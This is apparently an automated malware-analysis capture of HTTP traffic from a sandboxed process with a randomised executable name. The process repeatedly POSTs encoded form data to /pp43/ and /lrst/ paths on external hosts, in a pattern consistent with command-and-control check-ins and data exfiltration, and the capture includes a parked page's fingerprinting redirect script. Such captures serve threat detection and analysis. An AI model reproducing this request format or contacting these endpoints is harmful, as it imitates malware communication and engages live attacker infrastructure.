                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    33 | 192.168.2.4 | 49774 | 103.224.182.242 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:22.624286890 CEST | 822 | OUT | POST /pp43/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.nobartv6.website
                                                    Origin: http://www.nobartv6.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.nobartv6.website/pp43/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6d 57 79 55 2f 72 32 54 6e 52 34 4f 43 34 6f 44 57 2f 38 6b 68 4b 35 71 71 76 73 35 67 41 52 5a 47 76 47 33 5a 72 2f 38 69 75 52 54 43 69 35 58 4d 33 68 72 50 78 6c 30 72 70 63 57 4e 41 47 6a 49 66 43 74 46 75 33 45 6d 37 65 78 4c 6b 68 70 4b 33 32 51 63 45 43 70 63 44 7a 69 31 6c 2f 6a 68 51 58 6b 38 45 46 6b 5a 51 6c 66 66 46 4c 77 4a 4f 71 4c 49 44 56 2f 56 71 64 77 70 39 53 6f 68 75 65 46 56 7a 42 4f 47 78 6e 79 54 51 7a 30 51 49 52 77 73 51 37 30 4a 61 41 68 49 56 54 35 41 7a 36 7a 68 56 43 33 4e 49 37 2f 77 50 46 32 30 46 54 73 4b 51 3d 3d
                                                    Data Ascii: y0qt3F=ywbiYQ/q4W1CmWyU/r2TnR4OC4oDW/8khK5qqvs5gARZGvG3Zr/8iuRTCi5XM3hrPxl0rpcWNAGjIfCtFu3Em7exLkhpK32QcECpcDzi1l/jhQXk8EFkZQlffFLwJOqLIDV/Vqdwp9SohueFVzBOGxnyTQz0QIRwsQ70JaAhIVT5Az6zhVC3NI7/wPF20FTsKQ==
                                                    Sep 26, 2024 09:26:23.209619999 CEST | 876 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 26 Sep 2024 07:26:23 GMT
                                                    server: Apache
                                                    set-cookie: __tad=1727335583.8586432; expires=Sun, 24-Sep-2034 07:26:23 GMT; Max-Age=315360000
                                                    vary: Accept-Encoding
                                                    content-encoding: gzip
                                                    content-length: 581
                                                    content-type: text/html; charset=UTF-8
                                                    connection: close
                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                    Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    34 | 192.168.2.4 | 49775 | 103.224.182.242 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:25.173876047 CEST | 842 | OUT | POST /pp43/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.nobartv6.website
                                                    Origin: http://www.nobartv6.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.nobartv6.website/pp43/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 6c 5a 66 4e 65 33 4c 5a 48 38 6c 75 52 54 4a 43 35 53 43 58 67 47 50 32 74 38 72 6f 77 57 4e 41 36 6a 49 65 79 74 46 64 66 4c 33 37 65 7a 43 45 68 6e 46 58 32 51 63 45 43 70 63 43 58 4d 31 6a 58 6a 67 6c 66 6b 2b 6c 46 72 52 77 6c 59 50 31 4c 77 4e 4f 71 50 49 44 56 4a 56 72 42 65 70 34 65 6f 68 73 47 46 57 69 42 4a 64 68 6e 34 64 77 7a 69 5a 35 34 72 72 7a 4f 45 50 71 4d 50 4b 31 72 4f 42 31 72 70 77 6b 6a 67 66 49 66 4d 74 49 4d 43 35 47 75 6c 52 58 68 46 45 34 68 69 44 42 66 6b 36 38 39 45 4f 6a 66 39 69 61 55 3d
                                                    Data Ascii: y0qt3F=ywbiYQ/q4W1Cn2CUsYuTix4JOYoDff84hKlqquYThylZfNe3LZH8luRTJC5SCXgGP2t8rowWNA6jIeytFdfL37ezCEhnFX2QcECpcCXM1jXjglfk+lFrRwlYP1LwNOqPIDVJVrBep4eohsGFWiBJdhn4dwziZ54rrzOEPqMPK1rOB1rpwkjgfIfMtIMC5GulRXhFE4hiDBfk689EOjf9iaU=
                                                    Sep 26, 2024 09:26:25.747320890 CEST | 876 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 26 Sep 2024 07:26:25 GMT
                                                    server: Apache
                                                    set-cookie: __tad=1727335585.2645835; expires=Sun, 24-Sep-2034 07:26:25 GMT; Max-Age=315360000
                                                    vary: Accept-Encoding
                                                    content-encoding: gzip
                                                    content-length: 581
                                                    content-type: text/html; charset=UTF-8
                                                    connection: close
                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                    Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    35 | 192.168.2.4 | 49776 | 103.224.182.242 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:27.727941990 CEST | 10924 | OUT | POST /pp43/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.nobartv6.website
                                                    Origin: http://www.nobartv6.website
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.nobartv6.website/pp43/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 79 77 62 69 59 51 2f 71 34 57 31 43 6e 32 43 55 73 59 75 54 69 78 34 4a 4f 59 6f 44 66 66 38 34 68 4b 6c 71 71 75 59 54 68 79 64 5a 44 75 57 33 5a 4f 54 38 6b 75 52 54 41 69 35 54 43 58 68 45 50 77 46 34 72 6f 4d 47 4e 47 2b 6a 4a 39 71 74 4f 4d 66 4c 75 72 65 7a 64 55 68 6d 4b 33 33 4b 63 45 53 74 63 44 6e 4d 31 6a 58 6a 67 69 76 6b 33 55 46 72 58 77 6c 66 66 46 4c 38 4a 4f 71 6a 49 44 4e 5a 56 6f 74 67 6f 4d 69 6f 68 4d 57 46 47 41 5a 4a 52 68 6e 2b 61 77 79 68 5a 35 6b 4f 72 7a 54 39 50 70 51 6c 4b 32 33 4f 43 69 65 4f 74 67 2f 50 43 6f 33 70 78 49 64 69 77 47 36 7a 49 51 70 41 43 4b 34 39 63 46 50 79 38 66 63 49 56 32 66 35 78 74 49 44 56 77 4e 79 73 47 73 58 59 58 4d 50 4b 2b 66 34 35 49 4a 34 73 4d 36 35 59 66 47 4e 33 56 4c 4f 49 53 33 5a 53 46 75 52 7a 32 64 70 78 61 52 39 7a 33 71 69 5a 30 42 6c 50 59 76 63 78 5a 52 43 48 4c 55 76 6b 37 7a 70 69 37 55 32 38 46 78 4d 64 4f 42 61 6c 4a 41 48 48 4e 30 31 55 73 38 44 39 30 69 4a 30 65 6e 6d 78 51 31 45 73 35 64 47 51 70 65 [TRUNCATED]
                                                    Data Ascii: y0qt3F=[TRUNCATED]
                                                    Sep 26, 2024 09:26:28.315099001 CEST | 876 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 26 Sep 2024 07:26:28 GMT
                                                    server: Apache
                                                    set-cookie: __tad=1727335588.3604621; expires=Sun, 24-Sep-2034 07:26:28 GMT; Max-Age=315360000
                                                    vary: Accept-Encoding
                                                    content-encoding: gzip
                                                    content-length: 581
                                                    content-type: text/html; charset=UTF-8
                                                    connection: close
                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 6e db 30 0c 3d c7 5f 41 b8 07 3b e8 6a a5 c8 d6 01 89 ed 1d 06 0c d8 b0 c3 d0 6e e7 41 91 e9 58 ad 2d 79 12 93 34 28 f2 ef a5 1c 37 ed ba c3 aa 8b 2d ea 3d f2 3d 9a 72 de 50 d7 96 51 de a0 ac f8 41 9a 5a 2c 8d 5d 49 47 db ab 6c 87 2b af 09 73 71 8c 47 b9 57 4e f7 04 b4 ef b1 88 09 ef 49 dc ca ad 3c 46 63 f0 4e 15 b1 b8 f5 a2 d6 66 8d ae 77 da 90 d0 ba c6 ac d3 26 bb f5 71 99 8b 23 f6 7f a9 ca 68 2b 1d 38 ac b4 43 45 bf 5b 6d ee a0 80 a4 21 ea 17 42 ec 76 bb ec b5 46 d1 f7 ef e7 e2 53 b2 8c 22 21 e0 06 09 24 90 ee d0 6e 08 6c 0d f3 d9 0c 3a ad 9c f5 a8 ac a9 3c 90 05 bc 47 b5 21 64 e0 53 21 d0 35 50 83 f0 42 3f f4 ce 76 da 73 4c ea d6 43 6d 1d 78 db 21 53 a4 b7 26 aa 37 46 91 b6 86 8f db 76 25 d5 dd f5 98 2a 9d c2 43 34 d9 69 53 d9 5d d6 5a 25 03 2a 73 d8 b7 52 61 fa 97 b3 f3 a4 ee 8b 8b 8f c9 74 19 1d a2 88 dc 3e 30 59 a5 27 70 95 fb 39 9a 28 c0 23 8d 9b f4 75 b5 77 c1 20 f3 27 a1 6d 75 ff 63 d4 5c c0 97 67 27 df 6e 58 87 ac d2 87 ce 1a 4d 96 43 eb 45 90 ed f1 [TRUNCATED]
                                                    Data Ascii: Tn0=_A;jnAX-y4(7-==rPQAZ,]IGl+sqGWNI<FcNfw&q#h+8CE[m!BvFS"!$nl:<G!dS!5PB?vsLCmx!S&7Fv%*C4iS]Z%*sRat>0Y'p9(#uw 'muc\g'nXMCE'V4d=%gv8LMK~,`'9?"j9TRnz<}[BtI~/<7vT_=6^Z+ZWgbsxjJoaI=/X%4Sa[ABp-cGOy9ms1gKux[soY4


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    36 | 192.168.2.4 | 49777 | 103.224.182.242 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:30.266987085 CEST | 546 | OUT | GET /pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVu5vGFEpVLHigJkCccCfv+m7blBfZ8lkEAhE=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.nobartv6.website
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Sep 26, 2024 09:26:30.854708910 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 26 Sep 2024 07:26:30 GMT
                                                    server: Apache
                                                    set-cookie: __tad=1727335590.5212206; expires=Sun, 24-Sep-2034 07:26:30 GMT; Max-Age=315360000
                                                    vary: Accept-Encoding
                                                    content-length: 1487
                                                    content-type: text/html; charset=UTF-8
                                                    connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69 74 65 2f 70 70 34 33 2f 3f 79 30 71 74 33 46 3d 2f 79 7a 43 62 6c 72 4a 73 45 52 75 71 67 7a 33 6a 4a 61 65 67 33 67 58 57 71 49 6e 57 4e 49 75 2b 36 5a 68 38 2f 38 59 71 42 30 31 46 75 4f 2b 44 4c 58 66 67 63 6c 76 48 6e 74 33 43 57 4e 75 47 6c 6c 58 74 70 30 38 47 6e 4c 51 4b 4a 32 69 43 74 6a 56 75 35 76 47 46 45 70 56 4c 48 69 67 4a 6b 43 63 63 43 66 76 2b 6d 37 62 6c 42 66 5a 38 6c 6b 45 41 68 45 3d 26 6b 5a [TRUNCATED]
                                                    Data Ascii: <html><head><title>nobartv6.website</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.nobartv6.website/pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVu5vGFEpVLHigJkCccCfv+m7blBfZ8lkEAhE=&kZ=E8WpI&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffff
                                                    Sep 26, 2024 09:26:30.854734898 CEST | 523 | IN | Data Raw: 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6f 62 61 72 74 76 36 2e 77 65 62 73 69
                                                    Data Ascii: ff" text="#000000"><div style='display: none;'><a href='http://www.nobartv6.website/pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVu5vGFEpVLHigJkCccCfv+m7blBfZ8lkEAhE=&kZ=E8WpI&fp=-3'>Click he


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    37 | 192.168.2.4 | 49778 | 85.159.66.93 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:35.999768972 CEST | 810 | OUT | POST /lrst/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.sailnway.net
                                                    Origin: http://www.sailnway.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 203
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.sailnway.net/lrst/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 52 75 6b 69 33 74 64 73 37 58 65 4f 73 54 68 56 62 32 63 63 74 6c 62 55 46 31 56 42 66 66 4e 56 43 46 56 6d 50 70 79 65 35 33 42 4d 4b 66 33 4b 45 47 47 35 74 76 72 6b 6f 76 70 44 74 49 35 6e 6c 78 4b 51 70 4e 53 37 52 47 4c 77 4e 67 75 5a 50 38 39 6a 35 31 52 73 6a 65 72 66 51 51 49 42 33 67 56 63 66 44 62 31 33 63 4d 53 77 50 51 56 54 55 30 76 36 4a 35 2b 4a 31 78 69 5a 6f 39 65 4a 4e 64 50 2b 74 45 4c 51 69 44 4d 69 4d 48 71 31 43 50 57 6f 45 35 2f 4d 56 4c 36 4e 2f 76 2f 68 51 37 59 2b 5a 73 45 33 4a 2f 38 34 69 2f 77 4f 70 35 4c 4a 67 3d 3d
                                                    Data Ascii: y0qt3F=rBDGnmFpclO/Ruki3tds7XeOsThVb2cctlbUF1VBffNVCFVmPpye53BMKf3KEGG5tvrkovpDtI5nlxKQpNS7RGLwNguZP89j51RsjerfQQIB3gVcfDb13cMSwPQVTU0v6J5+J1xiZo9eJNdP+tELQiDMiMHq1CPWoE5/MVL6N/v/hQ7Y+ZsE3J/84i/wOp5LJg==


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    38 | 192.168.2.4 | 49779 | 85.159.66.93 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:38.548629045 CEST | 830 | OUT | POST /lrst/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.sailnway.net
                                                    Origin: http://www.sailnway.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 223
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.sailnway.net/lrst/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                    Data Raw: 79 30 71 74 33 46 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 44 65 30 69 34 75 31 73 73 48 66 38 6a 7a 68 56 41 6d 63 51 74 6c 6e 55 46 77 35 52 65 74 35 56 43 6e 4e 6d 4f 6f 79 65 30 58 42 4d 41 2f 33 31 61 32 47 69 74 76 75 62 6f 75 56 44 74 49 39 6e 6c 78 61 51 6f 36 2b 30 51 57 4c 79 4c 67 75 66 4c 38 39 6a 35 31 52 73 6a 65 75 58 51 51 77 42 33 52 46 63 65 68 7a 71 35 38 4d 64 67 66 51 56 58 55 30 72 36 4a 35 51 4a 77 56 49 5a 72 46 65 4a 4d 74 50 2f 38 45 4d 48 53 44 4b 6d 4d 47 70 6b 42 32 68 6d 47 6f 51 4e 58 61 62 4c 4e 7a 74 74 32 71 43 76 6f 4e 54 6c 4a 62 50 6c 6c 32 45 44 71 45 43 53 70 57 64 61 4f 48 41 41 72 41 39 5a 51 4b 57 53 61 64 30 41 6f 30 3d
                                                    Data Ascii: y0qt3F=rBDGnmFpclO/De0i4u1ssHf8jzhVAmcQtlnUFw5Ret5VCnNmOoye0XBMA/31a2GitvubouVDtI9nlxaQo6+0QWLyLgufL89j51RsjeuXQQwB3RFcehzq58MdgfQVXU0r6J5QJwVIZrFeJMtP/8EMHSDKmMGpkB2hmGoQNXabLNztt2qCvoNTlJbPll2EDqECSpWdaOHAArA9ZQKWSad0Ao0=


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    39 | 192.168.2.4 | 49780 | 85.159.66.93 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:41.102494955 CEST | 10912 | OUT | POST /lrst/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.sailnway.net
                                                    Origin: http://www.sailnway.net
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 10303
                                                    Connection: close
                                                    Cache-Control: max-age=0
                                                    Referer: http://www.sailnway.net/lrst/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
